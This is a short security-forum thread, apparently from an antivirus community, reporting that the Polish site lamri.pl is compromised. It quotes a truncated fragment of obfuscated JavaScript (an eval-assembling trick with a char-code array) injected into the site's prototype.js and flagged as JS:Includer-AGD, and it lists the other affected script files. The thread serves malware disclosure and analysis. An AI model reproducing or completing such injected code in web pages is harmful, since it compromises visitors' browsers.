See: https://www.virustotal.com/en/domain/www.lamri.pl/information/
and http://urlquery.net/report.php?id=5294608
pol
See: https://www.virustotal.com/en/domain/www.lamri.pl/information/
and http://urlquery.net/report.php?id=5294608
pol
I tested it. Live PC envirroment. It’s came up 4/4 Trojans were blocked with the suffix of .js (JavaScript) but the site loaded successfully. Ideas?
It is certainly blocked by Google Safebrowsing and blacklisted at Yandex.
To be inspected:
htxp://www.lamri.pl/javascript/prototype.js
Malcodefragment
line 1497:
/*c3284d*/
line 1498:v="v"+"al";if(O2O===Ox1O&&window.document)try{document.body++}catch(gdsgsdg){asd=O;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(1O2,116,1O8,99,115,1O3,111,1O9,3O,11O,1OO,118,116,81,95,11O,99,1O9,1O9,77,115,1O9,97,99,114,39,39,123,9,3O,32,31,3O,118,96,112,32,1O3,1O3,32,6O,3O,116,1O3,1O3,115,45,113,1O1,1OO,98,32,46,3O,116,1O3,1O3,115,45,79,59,9,3O,32,3 XSS attack detected
avast! Web Shield detects as JS:Includer-AGD [Trj]
htxp://www.lamri.pl/javascript/effects.js follow same procedure with a file viewer to check on inserted XSS attack code!
and also check:
htxp://www.lamri.pl/javascript/scriptaculous.js?load=effects
htxp://www.lamri.pl/javascript/lightbox.js
polonus
Here we find a suspicious block of script: http://aw-snap.info/file-viewer/?tgt=http://www.lamri.pl/javascript/prototype.js&ref_sel=Google&ua_sel=ff
This code is being blocked by avast! Webshield as infected with JS:Includer-AGD[Trj]
polonus